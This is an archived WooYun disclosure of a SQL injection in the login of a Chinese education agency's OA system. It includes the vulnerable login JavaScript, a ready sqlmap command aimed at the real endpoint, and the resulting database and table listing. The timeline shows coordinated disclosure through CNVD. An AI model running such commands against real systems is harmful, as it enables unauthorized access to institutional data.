乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-22: 细节已通知厂商并且等待厂商处理中 2015-05-27: 厂商已经确认,细节仅向厂商公开 2015-06-06: 细节向核心白帽子及相关领域专家公开 2015-06-16: 细节向普通白帽子公开 2015-06-26: 细节向实习白帽子公开 2015-07-11: 细节向公众公开
中央电化教育馆某系统存在注入,求别查水表.
http://oa.ncet.edu.cn/loginAction.do post注入。登入没有做检查,而且
<script language="JavaScript" type="text/JavaScript"><!--function $(objStr){return document.getElementById(objStr);} //新建cookie。 //hours为空字符串时,cookie的生存期至浏览器会话结束。hours为数字0时,建立的是一个失效的cookie,这个cookie会覆盖已经建立过的同名、同path的cookie(如果这个cookie存在)。 function setCookie(name,value,hours,path){ var name = escape(name); var value = escape(value); var expires = new Date(); expires.setTime(expires.getTime() + hours*3600000); path = path == "" ? "" : ";path=" + path; _expires = (typeof hours) == "string" ? "" : ";expires=" + expires.toUTCString(); document.cookie = name + "=" + value + _expires + path; } //获取cookie值 function getCookieValue(name){ var name = escape(name); //读cookie属性,这将返回文档的所有cookie var allcookies = document.cookie; //查找名为name的cookie的开始位置 name += "="; var pos = allcookies.indexOf(name); //如果找到了具有该名字的cookie,那么提取并使用它的值 if (pos != -1){ //如果pos值为-1则说明搜索"version="失败 var start = pos + name.length; //cookie值开始的位置 var end = allcookies.indexOf(";",start); //从cookie值开始的位置起搜索第一个";"的位置,即cookie值结尾的位置 if (end == -1) end = allcookies.length; //如果end值为-1说明cookie列表里只有一个cookie var value = allcookies.substring(start,end); //提取cookie的值 return unescape(value); //对它解码 } else return ""; //搜索失败,返回空字符串 } //删除cookie function deleteCookie(name,path){ var name = escape(name); var expires = new Date(0); path = path == "" ? "" : ";path=" + path; document.cookie = name + "="+ ";expires=" + expires.toUTCString() + path; } function tologin(){ if( $("saveCookie").checked){ setCookie("loginname",$("loginname").value,24,"/"); setCookie("password",$("password").value,24,"/"); } else{ deleteCookie("loginname","/"); deleteCookie("password","/"); } document.form1.action="/jsp/organization/verifyLogin3.jsp"; document.form1.submit();}window.onload = function(){ //分析cookie值,显示上次的登陆信息 var userNameValue = getCookieValue("loginname"); $("loginname").value = userNameValue; var passwordValue = getCookieValue("password"); $("password").value = passwordValue; //写入点击事件 }
看了看貌似直接用cookie判断的用来提交的 感觉这东西用js写不太好吧。没敢深入研究,怕水表爆炸。
python sqlmap.py -u "http://oa.ncet.edu.cn/jsp/organization/verifyLogin3.jsp" --data="loginname=admin*&password=admin&flag=login" --dbs
available databases [8]:[*] APEX_030200[*] CTXSYS[*] EXFSYS[*] MDSYS[*] SUNOA1[*] SYS[*] SYSTEM[*] XDB
Database: SUNOA1[210 tables]+-----------------------+| AFFAIR || AFFAIRARCHIVE || AFRELATION || BDSXKZ || BDYS || BMGL || BMXX || BOOKMARKS || CALENDAR || CALENDAR2 || CALENDAR_ZHIBAN || CARINFO || CLASSUSER || CLWX || DASHIJI || DATACOPYSTATE || DATEDELAI || DAY_AFFAIR || DAY_AFFAIR_JIUCAN || DJGNEWS || DOCUMENT || DOCUMENT_FILE || DOCUMENT_HISTORY || DOCUMENT_SIGNATURE || FGWCXL || FGZLXD || FHYS || FILESHARE || FILETABLE || FILETABLE2 || FJCP || FLFG || FNGZ || FOABAOXIU || FQCBX || FSWLC || FWJCB || FZLWJBG || F_DSKP || F_DSZB || F_XSKP || F_XSZB || GNGL || GNLXGL || GONGGAO_PERSON || GRBQ || GRTXL || GSGL || HJJML || INDEXIMAGE || INFO || INFOOPEN || INFOPERSON || INFO_JIAOLIU || INSIDEINFOFILE || JIEDAI || JQCALENDAR || JSGL || JSGN || LCMC || LEADDOCMANAGE || LEADDOCMANAGE02 || LEADDOCMANAGE05 || LEADDOCMANAGE07 || LEADDOCMANAGE1 || LEADDOCMANAGE101 || LEADDOCMANAGE102 || LEADDOCMANAGE103 || LEADDOCMANAGE104 || LEADDOCMANAGE105 || LEADDOCMANAGE106 || LEADDOCMANAGE107 || LEADDOCMANAGE108 || LEADDOCMANAGE109 || LEADDOCMANAGE110 || LEADDOCMANAGE111 || LEADDOCMANAGE112 || LEADDOCMANAGE113 || LEADDOCMANAGE114 || LEADDOCMANAGE115 || LEADDOCMANAGE116 || LEADDOCMANAGE117 || LEADDOCMANAGE118 || LEADDOCMANAGE120 || LEADDOCMANAGE121 || LEADDOCMANAGE122 || LEADDOCMANAGE123 || LEADDOCMANAGE124 || LEADDOCMANAGE125 || LEADDOCMANAGE126 || LEADDOCMANAGE127 || LEADDOCMANAGE128 || LEADDOCMANAGE129 || LEADDOCMANAGE130 || LEADDOCMANAGE131 || LEADDOCMANAGE132 || LEADDOCMANAGE133 || LEADDOCMANAGE134 || LEADDOCMANAGE135 || LEADDOCMANAGE136 || LEADDOCMANAGE137 || LEADDOCMANAGE138 || LEADDOCMANAGE139 || LEADDOCMANAGE140 || LEADDOCMANAGE21 || LEADDOCMANAGE22 || LEADDOCMANAGE23 || LEADDOCMANAGE24 || LEADDOCMANAGE26 || LEAVE_WORD_BOARD || LOGCZ || LOGDL || MEETINGINFO || MEETINGPLAN || MEETINGROOMINFO || MEETINGSUMMARY || MESSAGE || MONTHDELAI || MOTORMANINFO || NEWSISSUE || NODECONTRAL || OFFICEDOCUMENT || PARAMETER || PARAMETERTYPE || PARTY || PBLAPPROVEPERSON || PBLCTNCALSS || PBLCTNINFO_POINT || PBLCTNINFO_SENDIF || PBLCTN_INFO || PBLCTN_PUBCTNINFO || POINT || PUBLICATION || PUBLICATIONCLASS || PUBLIC_DOCUMENT || QITA || QYZHCHENG || QYZL || RCAP || READOVER || ROOMINFO || RYGN || SENDCLASS || SGJL || SHEN_HE_PERSON_MANAGE || SYZL || SZEMIL || TASK || TASKACL || TASKACLARCHIVE || TASKARCHIVE || TASKMANAGER || TASKMANAGERACL || TBLDEPAT || TBLGROUP || TBLPERMCONF || TBLROLE || TBLUDRELATION || TBLUSER || TBLUSERINFO || TBLUSERROLE || TBLWORKCATEGORY || TBLWORKELEMENT || TEMPLATE_FILE || TEST || TESTDOC || TESTT || TMPDOCELEMENTDEF || TMPDOCNUMBER || TMPDOCTABLEDEF || TMPDOCUMENTDEFINE || TMPDOCUMENTDIVIDE || TMPDOCUMENTTACHE || TMPELEMENTTYPE || TMPPERSONINCEPT || TMPTACHEDIRECTOR || TZEMIL || VCHAPPL || VEHICLE || VERSION_FILE || WAIBUHUIYI || WAIBUHUIYIPERSON || WEEKPLAN || WJJML || WORKDATEINFO || WORKLOG || XTCSLX || XTCSZ || XW || YGD || YHGL || YWsendDoc || ZARCHIVE || ZATCHIVESFILE || ZBAPT || ZBDJT || ZBZD || ZCFG || ZCFGPERSON || ZHUANBANXX || ZJEDUACCEPT || ZJEDUACCEPT1 || ZJEDUACCEPT2 || ZJEDUACCEPTACL || ZJEDUHUIYI || ZJETCSEND || ZJETCSEND2 || ZJETCSEND4 || ZTEACHER || ZTONGJI |+-----------------------+
数据不敢跑我怕查水表,不过看看这表名也知道里面东西挺多的吧
危害等级:中
漏洞Rank:9
确认时间:2015-05-27 11:27
CNVD确认所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。
暂无
